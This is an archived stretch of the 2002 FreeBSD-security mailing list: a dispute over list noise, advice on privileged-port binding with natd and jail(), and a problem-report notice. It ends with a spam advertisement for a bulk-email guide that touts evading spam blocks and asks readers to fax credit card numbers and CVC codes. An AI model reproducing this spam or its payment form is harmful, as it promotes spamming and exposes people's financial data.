Replies to spam are particularly unwelcome and unwise. o "Chatter" needs to be taken offline or taken to FreeBSD-Chat. Thank you! M -- o Mark Murray \_ O.\_ Warning: this .sig is umop ap!sdn To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 14:49:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9DA6937B400 for ; Sat, 24 Aug 2002 14:49:48 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0645E43E65 for ; Sat, 24 Aug 2002 14:49:48 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from DaleCoportable [12.145.226.229] by mail.gbronline.com (SMTPD32-7.12) id AF493BD80078; Sat, 24 Aug 2002 16:48:57 -0500 Message-ID: <024601c24bb7$8dd2b550$a9ec910c@DaleCoportable> From: "Kevin D. Kinsey, DaleCo, S.P." To: , "Mark Murray" References: <200208241801.g7OI16t0000946@grimreaper.grondar.org> Subject: Re: HEADS UP! Signal-to-noise ratio here is _terrible_. Date: Sat, 24 Aug 2002 16:45:21 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Mark Murray" To: Sent: Saturday, August 24, 2002 1:01 PM Subject: HEADS UP! Signal-to-noise ratio here is _terrible_. > Hello FreeBSD-Security subscriber > > The signal-to-noise ratio on this list is _terrible_. How many > of you have noticed that FreeBSD's security-savvy folks are being > drowed out in a sea of chatter? > Possibly. But, this week's archives is the smallest so far this year --- http://docs.freebsd.org/mail/archive/2002/freebsd-security/ --- so either the drowned rats have left the sinking ship, or else Chicken Little felt a raindrop and hollered the sky is falling because I see no "sea" around here. kdk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 18:19:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 709FC37B400 for ; Sat, 24 Aug 2002 18:19:14 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id E8AE343E72 for ; Sat, 24 Aug 2002 18:19:13 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g7P1J0wr046025; Sat, 24 Aug 2002 18:19:04 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200208250119.g7P1J0wr046025@gw.catspoiler.org> Date: Sat, 24 Aug 2002 18:19:00 -0700 (PDT) From: Don Lewis Subject: Re: user based firewalling with ipfw and priviledged ports. To: rmeijer@xs4all.nl Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020824100341.T75248-100000@xs1.xs4all.nl> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 24 Aug, Rob J Meijer wrote: > The problem is that I need to bind to a priviledged port, and in order to > do this I need to start as root and than change the (e&r) uid of the > process to the target uid. It apears that the changing of the process its > uid does not change the way that the user bit of trafic from the specific > socket is seen, both iptables and ipfw interpret the trafic as comming > from the root user. You might want to consider binding to predetermined unpriviledged port as the desired user and using natd to redirect incoming connections from the priviledged port to the unpriviledged port. The only real flaw in this scheme is that the wrong user could bind to the predetermined unpriviledged port. If each user has a separate chroot environment, you could prevent this problem by using jail() instead of chroot(), because jail() allows you to specify a separate IP address for each jail, and in this case you could allocate addresses from the loopback network 127.x.x.x. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 19: 5:13 2002 Delivered-To: freebsd-security@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0B6437B400; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 77F1943E6E; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7P25BJU051541; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7P25BNP051537; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) Date: Sat, 24 Aug 2002 19:05:11 -0700 (PDT) From: Johan Karlsson Message-Id: <200208250205.g7P25BNP051537@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-security@FreeBSD.org, security@FreeBSD.org Subject: Re: kern/22142: securelevel does not affect mount Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: securelevel does not affect mount Responsible-Changed-From-To: freebsd-security->security Responsible-Changed-By: johan Responsible-Changed-When: Sat Aug 24 19:04:48 PDT 2002 Responsible-Changed-Why: Use short names for mailing list to make searches using the web query form work with the shown responsible. This also makes open PR show up in the summery mail. http://www.freebsd.org/cgi/query-pr.cgi?pr=22142 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 19: 5:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0B6437B400; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 77F1943E6E; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7P25BJU051541; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7P25BNP051537; Sat, 24 Aug 2002 19:05:11 -0700 (PDT) Date: Sat, 24 Aug 2002 19:05:11 -0700 (PDT) From: Johan Karlsson Message-Id: <200208250205.g7P25BNP051537@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-security@FreeBSD.org, security@FreeBSD.org Subject: Re: kern/22142: securelevel does not affect mount Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: securelevel does not affect mount Responsible-Changed-From-To: freebsd-security->security Responsible-Changed-By: johan Responsible-Changed-When: Sat Aug 24 19:04:48 PDT 2002 Responsible-Changed-Why: Use short names for mailing list to make searches using the web query form work with the shown responsible. This also makes open PR show up in the summery mail. http://www.freebsd.org/cgi/query-pr.cgi?pr=22142 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Aug 24 22:40:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 76F2937B400 for ; Sat, 24 Aug 2002 22:40:43 -0700 (PDT) Received: from esibiz.com (xdsl120.dnvr.uswest.net [216.160.170.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4A70143E65 for ; Sat, 24 Aug 2002 22:40:42 -0700 (PDT) (envelope-from raneh1439@forum.dk) Received: from solutreen.geomar.de ([24.164.122.81] RDNS failed) by esibiz.com with Microsoft SMTPSVC(5.0.2195.4453); Sat, 24 Aug 2002 19:59:37 -0600 Message-ID: <00004bdf7370$00004bb3$00002422@fe.mail.jippii.net> To: Cc: , <101503.2706@compuserve.com>, , <102175.230@compuserve.com>, , <101346.0424@compuserve.com>, , , , , , , , , , , , , From: "Tony" Subject: I Finally got It2096 Date: Sat, 24 Aug 2002 18:57:57 -1900 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 25 Aug 2002 01:59:38.0212 (UTC) FILETIME=[116DBA40:01C24BDB] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Many people have made large amounts of money using Bulk Email. Bulk Email is an incredibly affordable form of LEGAL Advertising allowing a person to sell products or services to over 300 million people world- wide from their home Computer. With a home computer the bulk e-mailer can send out 50 Million Pieces of mail that could realistically cost $12,500,000 using the US Post Office. HOW? By purchasing the amazing new book everybody is talking about "Guide To The Professional Bulk Email Business". This book contains everything the Anti Commerce Radicals DON'T WANT YOU TO KNOW about how to and how not to advertise via BULK E-MAIL. This Book Explains Exactly how Bulk Email operates. The author has 8 years of Bulk Email Advertising experience. If you have intentions of Marketing your Product or Service Via the Internet THIS IS THE MOST IMPORTANT BOOK YOU WILL EVER READ. Regardless of how you may feel about this form of advertising, IT WORKS. The Introduction Cost during our initial marketing test is $39.00, but the value of the information contained within can be worth hundreds of thousands of dollars depending on your ambitions and goals. Don't hesitate! Order NOW, during this marketing test promotion. You will receive an email, within 24 hrs of receipt of your Payment, containing a down-load site where you will be able to download the book immediately. If you would prefer receiving your book on CD Rom, you will need to add Shipping & Handling charges. Your CD Rom will be shipped via Priority mail within 48 hours. You can Keep floundering with Search Engines, Banner Ads, and Internet Classifieds or spend $39.00 and Market Your Business With Something That WORKS. The "Guide to The Professional Bulk Email Business" contains detailed information on the following subjects: >> Introduction to bulk email >> Definition of bulk email >> Legal and political issues >> How does bulk email work >> All about Email Addresses >> What are Targeted lists? >> Don't be deceived by targeted lists >> Transmission speed >> Address seeding >> Multiple isp connections >> Cloaking or stealthing capabilities >> Email headers >> Headers and complaints >> Bulk email in the old days >> Anonymous servers >> Email blocking >> Outgoing blocking >> Relay server blocking >> Bulk email friendly isp's >> What is a backbone >> Email marketing >> What products sell the best via email >> Web sites & email >> Web sites and search engine positioning >> Telephone sales >> Fax on demand >> Auto responders >> Email response >> Domain names >> Accepting payment >> Credit cards >> Credit card safeguards >> Foreign credit card processors >> Credit card alternatives >> Checks by US Mail >> Checks by fax phone or email >> Electronic funds transfer >> Cod orders >> The future of bulk email >> Suggestions >> Anti spam sites (see what the other side is up to) By accepting and or reading this book you agree to hold the author, seller, reseller, distributor(s) And their agents harmless from any monetary or other damages directly or indirectly relating to the Material contained in this book and/or the practice of any activity contained or described in this book. *************ORDERING INFORMATION************ We accept VISA, MC, Discover, Checks-by-Fax or mail and Money Orders. TO ORDER, simply fill out the EZ ORDER FORM Below and Fax it to 1-661-244-4903 *****************EZ ORDER FORM**************** _____Yes! I would like to order the "GUIDE TO THE PROFESSIONAL BULK EMAIL BUSINESS" for the Introductory price of $39.00. Place your order TODAY with a faxed check or credit card info and you can download your Guide Book TOMORROW! If you would prefer to have your order shipped on CD Rom, please add applicable S&H charges as listed below: For Domestic orders add $5.50 for S&H: $39.00 + $5.50 = $44.50 total. For Intl orders add $25.00 for S&H: $39.00 + $25.00 = $64.00 total. If faxing, complete the form below and then fax it to: 1-661-244-4903. * Please check one of the following payment options: [ ] I am faxing or emailing an image of my check (Do not send original, we will make a draft from the faxed check). Attach completed check to the bottom of this form. [ ] I am faxing my credit card number and information. CREDIT CARD: ___ Visa ___ MC ___ Discover___ Issuing Bank: ________________________________________ Cardholder's Name: ___________________________________ Credit Card Number: __________________________________ Expiration Date: ___________ CVC#: _______ (The CVC # is the 3 digit security code on the back of your credit card) Authorized Amount to be charged to Credit Card is: $_______ Please add applicable S&H charges as listed below if you would like your Guide Book on CD Rom. For Domestic orders add $5.50 for S&H: $39.00 + $5.50 = $44.50 total. For Intl orders add $25.00 for S&H: $39.00 + $25.00 = $64.00 total. To protect against fraud, we only ship to the address listed on the credit card. Credit Card Billing Address: REQUIRED! Address: ___________________________________________ City: ______________________________________________ State / Zip: _________________________________________ Phone #: ___________________________________________ (For problems with your order only.) Email Address: _____________________________________ Signature:_________________________________________ Date:____________________ NOTE: If you prefer, you can mail this order form (with either a check, money order or credit card info) to the following address: PW MARKETING LLC 18565 Soledad Canyon Rd., Ste. 204 Canyon Country, CA 91387-1797 SIGNATURE: ____________________________________ (Required) Once opened, the CDs may not be returned, however, if found defective they will be replaced with like product at no additional charge. DATE:__________________________________ *******24 HOUR FAX SERVICES******* Please attach your check here and fax it to us at: 1-661-244-4903. Make all checks payable to: "PW MARKETING LLC". There is no need for you to send the original check. Please use "fine" setting on fax. ************************************ To be deleted from our mailing list please send us a email by clicking on the link below or copy and paste it in your browser. MailTo:pwmarket6743@yahoo.com?subject=remove-me Please put REMOVE in the subject line. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message